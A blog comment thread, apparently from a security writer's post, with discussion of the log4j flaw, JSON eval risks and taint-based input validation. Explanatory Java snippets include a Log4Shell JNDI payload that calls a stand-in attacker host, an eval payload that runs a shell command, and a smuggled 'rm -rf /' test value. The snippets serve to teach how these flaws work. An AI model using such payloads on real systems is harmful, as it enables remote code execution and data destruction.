Reginald Selkirk says
Are gingerbread men cannibal propaganda?
Bruce says
Marcus, what can you tell us about the log4j vulnerability?
Marcus Ranum says
Bruce@#2:
Marcus, what can you tell us about the log4j vulnerability?
If you’ve got the Apache logging system (log4j) installed, you need to disable it. It sounds like it’s a design disaster, and my prediction is that more bugs will be found in it.
The attack, so far as I can tell, is a category of input validation flaw – the library can be tricked into going to an arbitrary site and downloading a chunk of code, which is then run. The tricking part is done via a constructed URL sent to a system running the Apache logging system – the system pulls down a piece of arbitrary data in an LDAP request triggered by the constructed URL, which is then passed into the system in such a way that it’s executed with server privileges.
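To make that concrete, here’s a minimal sketch (my own illustration, with a made-up attacker hostname) of why this is so nasty – the application doesn’t have to do anything more exotic than log a string the attacker controls:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class Log4ShellSketch {
        private static final Logger log = LogManager.getLogger(Log4ShellSketch.class);

        public static void main(String[] args) {
            // Pretend this arrived in an HTTP header; "evil.example.com"
            // is a made-up attacker host for illustration.
            String userAgent = "${jndi:ldap://evil.example.com/a}";

            // On vulnerable log4j versions, this innocent-looking call
            // expands the ${jndi:...} pattern, makes an LDAP request to
            // the attacker's server, and can end up loading and running
            // a remote class with the server's privileges.
            log.info("request from user-agent: {}", userAgent);
        }
    }

That’s the whole “exploit” from the application’s side: one log line.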
That sort of design flaw is a result of over-complex layered software depending on over-complex lower layers. That’s nothing surprising; people who pay attention to software and software security have been warning for decades that badly designed, over-complex, layered software is going to become an endless pit of security vulnerabilities. I saw some comment in the press that it’s an open source software issue, but I don’t agree with that – it’s a software layering/design problem, and the fact that it’s open source exacerbates it because attackers can review the source and look for flaws. But commercial software is similarly full of such flaws.
Part of why I was so happy to get out of the security field is that, after decades of trying to make things better, I was finally tired of watching software “engineers” make the problem worse as fast as they could – far faster than security practitioners could get the word out that they need to be careful with what they’re doing. There’s just too much emphasis on throwing “features” over the fence and not enough on good design and implementation. This bug, and the many that are constantly being found, are a manifestation not of a “flaw underpinning Apache” (as some have put it) but more like a “flaw underpinning how internet software is designed, implemented, and deployed.” It’s an endless pit of shit, and all that’s going to be discovered when people dig through it is: more shit.
Marcus Ranum says
One of the worst ideas in computer security, lately, is JSON and “RESTful” interfaces. It’s basically the worst possible way to solve the pickling/unpickling problem for data – instead of writing a file containing some kind of data structure that you can reconstruct, you write a file of executable declarations of a data structure, and you then reconstruct the data structure by executing the file. For that to work safely, the programmer needs to be aware that he’s importing file data as executable runtime, and the file may contain commands that spawn other processes or make system calls to change file ownerships, open network connections – all kinds of nasty, ugly things. Whoever came up with that idea was a lazy idiot who decided to ignore 50 years of human experience with writing software and decided that something incredibly dumb was clever. Or something. The current state of software is absolutely chock full of that kind of sloppy thinking, and it has extended to “devops” – the idea that developers, who generally suck at developing, should also do system administration and operations, which are a totally different art-form and which developers suck at even more.
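To illustrate what I mean about data-as-executable versus data-as-data, here’s a sketch in Java – using the old Nashorn script engine for the eval() style (it shipped with JDK 8 through 14) and Jackson (assumed on the classpath) for the parser style; the payload is invented for illustration:

    import javax.script.ScriptEngine;
    import javax.script.ScriptEngineManager;
    import com.fasterxml.jackson.databind.JsonNode;
    import com.fasterxml.jackson.databind.ObjectMapper;

    public class JsonUnpickle {
        public static void main(String[] args) throws Exception {
            // "Data" that is really code: evaluating it runs a command.
            String payload =
                "{ \"name\": (java.lang.Runtime.getRuntime().exec(\"id\"), \"bob\") }";

            // The eval() style: hand the text to a language runtime and let
            // it "reconstruct" the data by executing it. With the Nashorn
            // engine present, the exec() above actually runs.
            ScriptEngine js = new ScriptEngineManager().getEngineByName("JavaScript");
            if (js != null) { // Nashorn is absent on JDK 15 and later
                Object whoKnows = js.eval("(" + payload + ")"); // code and data are one thing
                System.out.println(whoKnows);
            }

            // The parser style: the text is only ever data. The payload
            // above would be a syntax error here, because JSON has no
            // function calls.
            JsonNode safe = new ObjectMapper().readTree("{ \"name\": \"bob\" }");
            System.out.println(safe.get("name").asText());
        }
    }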
Of course “not all developers” – there are a few great ones out there who are absolutely great at everything. Too bad they’re not writing all the open source code that’s being used to operate critical systems.
billseymour says
I particularly dislike most Java libraries/frameworks; and log4j is one of them. These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
(Sorry to contribute to the derailing of your post; but I wanted to blow off some steam.)
Marcus Ranum says
billseymour@#5:
These monstrosities always look to me like they were designed by some teenagers sitting in their basements going “COOL! Look at how complicated I can make it!”
Do you think they put that much thought into it?
To be fair, it’s not as though some other over-thought protocols and frameworks haven’t been equally awful: X.509, SNMP, XML, MIME, etc. I remember when MTR was pushing SNMP and we were all laughing about how “simple” it was and, seriously, WTF was the message structure so ridiculous for? Then there was the whole MIME-encoding thing: was the message a bunch of blocks inside the encoding, or was the encoding blocks inside a message? I know: let’s do both. WTF. WTF. WTF. Let me be frank: a lot of important software architectures were rammed through standards committees because of the ego issues of their authors, or for other really bad reasons – seldom because they were actually good.
There is a story I heard from someone highly placed at Sun Microsystems (SVP level) that Jim Gosling was basically so annoying with his EMACS thing that he was pretty much left to his own devices and ignored – and he decided to hack together a programming language for small device control: toaster ovens, elevators, things like that. The internet started to happen and someone thought a web programming language would have some value, and security was a concern, so someone asked around Sun and Gosling said, “sure, use my language!” Since security was a concern, some marketing weasel asked “is it secure?” (whatever that is) and Gosling said, “sure! of course!” and someone in the marketing department called it “Java” and made a cool logo for it. It was never designed to be a restricted runtime or a safe programming environment, and it didn’t even have a debugger (mandatory for commercial code). It was a perfect storm of ego and marketing bullshit and, inexplicably, a lot of the banking sector and several large businesses decided to standardize on Java because they trusted that Sun wasn’t being stupid – which, of course, they were. At the time I was on the speaking circuit and would ask for shows of hands from companies that were using Java for app development, and then I’d say, “have you ever considered Sun’s pathetic history of publishing and maintaining software and compilers?” Nobody seemed to remember the Sun C compiler (pretty good, but devastated by gcc, which was written with the help of a lot of people at Sun – ah hahahahaha, good times).
The industry standardizes on really sketchy stuff because of ego and marketing and then it winds up in production where it lingers forever like the smell of a dead woodchuck under your porch.
[All the stuff about URLs not being allowed from anywhere other than the site the code came from was last-minute kludgery to make it look like Java had a security model. At the time, I remember, serious people were saying that a programming language with a data-tainting model would be good for web stuff, and a system-wide lockout for system calls except through a container system, etc. But because of the way it all happened, nobody had time to actually think about stuff; they just went “well, Jim’s a great programmer, let’s ship it!” I mean, Gosling is a great programmer, but he was not exactly notorious for writing products, and EMACS damn sure wasn’t anything anyone would point at as commercial-ready code.]
cvoinescu says
Marcus, I can’t comment on RESTful interfaces, because I did not have to deal with them much — other than maybe to say that making them stateless solves some problems and introduces others, and makes other parts of the system stateful, often in an ad-hoc, awkward way that’s less well understood and harder to review.
But you’re probably wrong about JSON. Sure, it originated as some lazy dude saying “Why do I need to parse a config file, when I have a perfectly fine interpreted language here with a way to execute code to calculate the value of an expression? Let’s use that”. But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
Marcus Ranum says
cvoinescu@#7:
But it’s not implemented as executable anymore, hasn’t been for a while, and if people still eval() JSON, that’s on them.
Well, it’s on us, really.
The end user of software cannot fairly be expected to study the implementation of each piece of code they plan to put in production; they ought to be able to assume (!) that it was developed with care and understanding – but when that’s not the case, it suddenly incurs unexpected costs: downtime, or getting hacked. That applies to commercial as well as open source software – our ability to estimate the true cost of software is affected by follow-on costs to a degree that nobody seems to take into account.
Anyhow, yeah, we managed to get all those guys to stop using eval() to unpickle JSON, but that means the actual value of the design – which was being able to eval() JSON – is gone. thing=thing\newline turns out to be just as good, and it’s a lot easier. Of course, it could all be turned into a single function call to a standard pickle/unpickle routine anyway, so in that sense it may as well be XML. Ughhh.
I guess I’m just doing “you kids get offa my lawn” in this comment. In the course of my life I have written several hundred delimited record/pickle/unpickle routines and it’s just not a hard enough thing that it requires a big solution. You just walk your data-structures, write tombstones and IDs, store an index if you need one, etc. It’s a basic programming thing and you can’t claim to know how to program a computer unless you know how to store memory to/from a file.
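For what it’s worth, here’s roughly the scale of thing I’m talking about – a toy key=value pickle/unpickle in Java, with a tombstone line ending each record. The format and names are invented for illustration, and real code would also escape ‘=’ and newlines in values:

    import java.io.*;
    import java.util.*;

    // A toy flat-file pickle/unpickle: one "key=value" pair per line,
    // "%END" as a tombstone closing each record.
    public class FlatPickle {
        static final String TOMBSTONE = "%END";

        static void pickle(List<Map<String, String>> records, Writer out) throws IOException {
            for (Map<String, String> rec : records) {
                for (Map.Entry<String, String> e : rec.entrySet()) {
                    out.write(e.getKey() + "=" + e.getValue() + "\n");
                }
                out.write(TOMBSTONE + "\n");
            }
        }

        static List<Map<String, String>> unpickle(BufferedReader in) throws IOException {
            List<Map<String, String>> records = new ArrayList<>();
            Map<String, String> rec = new LinkedHashMap<>();
            String line;
            while ((line = in.readLine()) != null) {
                if (line.equals(TOMBSTONE)) {   // end of record
                    records.add(rec);
                    rec = new LinkedHashMap<>();
                } else {
                    int eq = line.indexOf('=');
                    if (eq < 0) continue;       // ignore malformed lines
                    rec.put(line.substring(0, eq), line.substring(eq + 1));
                }
            }
            return records;
        }

        public static void main(String[] args) throws IOException {
            StringWriter w = new StringWriter();
            pickle(List.of(Map.of("name", "bob", "shell", "/bin/sh")), w);
            System.out.print(w);
            System.out.println(unpickle(new BufferedReader(new StringReader(w.toString()))));
        }
    }

Note that nothing in that file format is executable; the worst a malformed file can do is produce a malformed record.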
There is another weird thing a lot of programmers don’t seem to understand: many ordinary-looking functions (such as an LDAP authentication request or a DNS lookup) are remote procedure calls. Even writing something to a file from someplace else and then later reconstituting it and acting upon it is a remote procedure call – it’s just delayed. Merely consuming the results as input is not enough; you need to carefully validate the input.
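For example (a made-up fragment, with an intentionally strict allowlist): a hostname read back from a config file is really the delayed result of a remote call, and nothing should act on it until it has been checked:

    import java.util.regex.Pattern;

    public class ValidateBeforeUse {
        // A deliberately strict allowlist for hostnames; invented for illustration.
        private static final Pattern HOSTNAME = Pattern.compile(
            "[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?" +
            "(\\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*");

        static String checkedHostname(String fromFile) {
            // Treat the value as untrusted input from a (delayed) remote
            // call, not as plain old memory: validate, then use.
            if (!HOSTNAME.matcher(fromFile).matches()) {
                throw new IllegalArgumentException("bad hostname: " + fromFile);
            }
            return fromFile;
        }

        public static void main(String[] args) {
            System.out.println(checkedHostname("example.com"));        // passes
            System.out.println(checkedHostname("evil.com; rm -rf /")); // throws
        }
    }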
The trusted O/S guys would tell us (and they’re mostly right…) that our programming languages, especially now that networking is part of the mix, need a “taint” data model, wherein some data is not treated as plain old memory until it has been checked out and some kind of blessing operation has been performed on it. In my wild dreams that would be implemented in the virtual machine with a separate memory region, and the kernel would also enforce controls; i.e., you cannot do a system call chain that ends with exec() on data from that region – and at the very least you cannot put memory from that region on the call stack! It could be implemented in software only, as a set of library functions (I did that in some stuff I wrote back in 1990), but the problem with libraries is getting programmers to adhere to them. It’s kind of embarrassing to admit this, but I figured this problem out when I was trying to convert BASIC strings into C strings in some code, and realized that having a parallel memory system was actually a pretty good way of maintaining isolation.
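A library-only sketch of the idea (not anyone’s real API – and, as I said, the weakness of the library approach is getting programmers to actually use it):

    import java.util.function.Predicate;

    // A taint wrapper, library-style: untrusted values live inside
    // Tainted<T> and the raw value is only reachable through bless(),
    // which runs a validation check first. Sketch only; a real system
    // would want VM- or kernel-level enforcement so the wrapper can't
    // be bypassed.
    public final class Tainted<T> {
        private final T dirty;

        private Tainted(T dirty) { this.dirty = dirty; }

        // Everything arriving from a network, file, or environment gets wrapped.
        public static <T> Tainted<T> of(T untrusted) { return new Tainted<>(untrusted); }

        // The single "blessing" operation: validate or die. No other accessor exists.
        public T bless(Predicate<T> check) {
            if (!check.test(dirty)) {
                throw new SecurityException("taint check failed");
            }
            return dirty;
        }

        public static void main(String[] args) {
            Tainted<String> input = Tainted.of("bob");              // e.g. from a socket
            String ok = input.bless(s -> s.matches("[a-z]{1,16}")); // validated, now usable
            System.out.println(ok);
            // There is deliberately no way to get at the string without bless().
        }
    }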
There was an amazing tool called Saber-C (later: CodeCenter) which was a C interpiler/development environment. It was like god’s debugger: you could call functions directly, examine memory structures, etc., but it didn’t use C memory allocation – each region of memory was tracked and allocated using a separate system. Think for a second how amazingly awesome that is! You got a rundown of all memory that was allocated but never freed, tracked by the line of code that did the allocation; you got breaks when memory was mis-read – if you put an int in something, you got an error if you read it back as a char; you got warnings when you went off the end of an array, or accessed something you had allocated after you freed it. It caught so many errors it was not even funny. Unfortunately, it cost $10,000 (a pittance for a software company) and had a learning curve – but then C++ came along, with its exquisitely bad handling of the notion of “variables”… (I used Cfront 1.0 and looked at the generated code; basically the C++ runtime treated all memory regions as dumpsters that it could put anything into or take out of, and there was no checking; it was all cast to void * and converted back, ugh.)
dangerousbeans says
some people like getting their kids’ ears pierced. not really ethical IMO, but holey kids are a thing
geoffb says
Not to publicize anything, but if you want the s** scared out of you, go look at snyk over, say, 2-3 days. As in https://security.snyk.io/page/1?type=npm – talk about layer upon layer of rot.
Marcus Ranum says
geoffb@#10:
Not to publicize anything, but if you want the s** scared out of you, go look at snyk over say 2-3 days.
Damn.
I used to wonder aloud how anyone could look at MS-DOS and say “this is the future of production systems” but I was an optimist back then.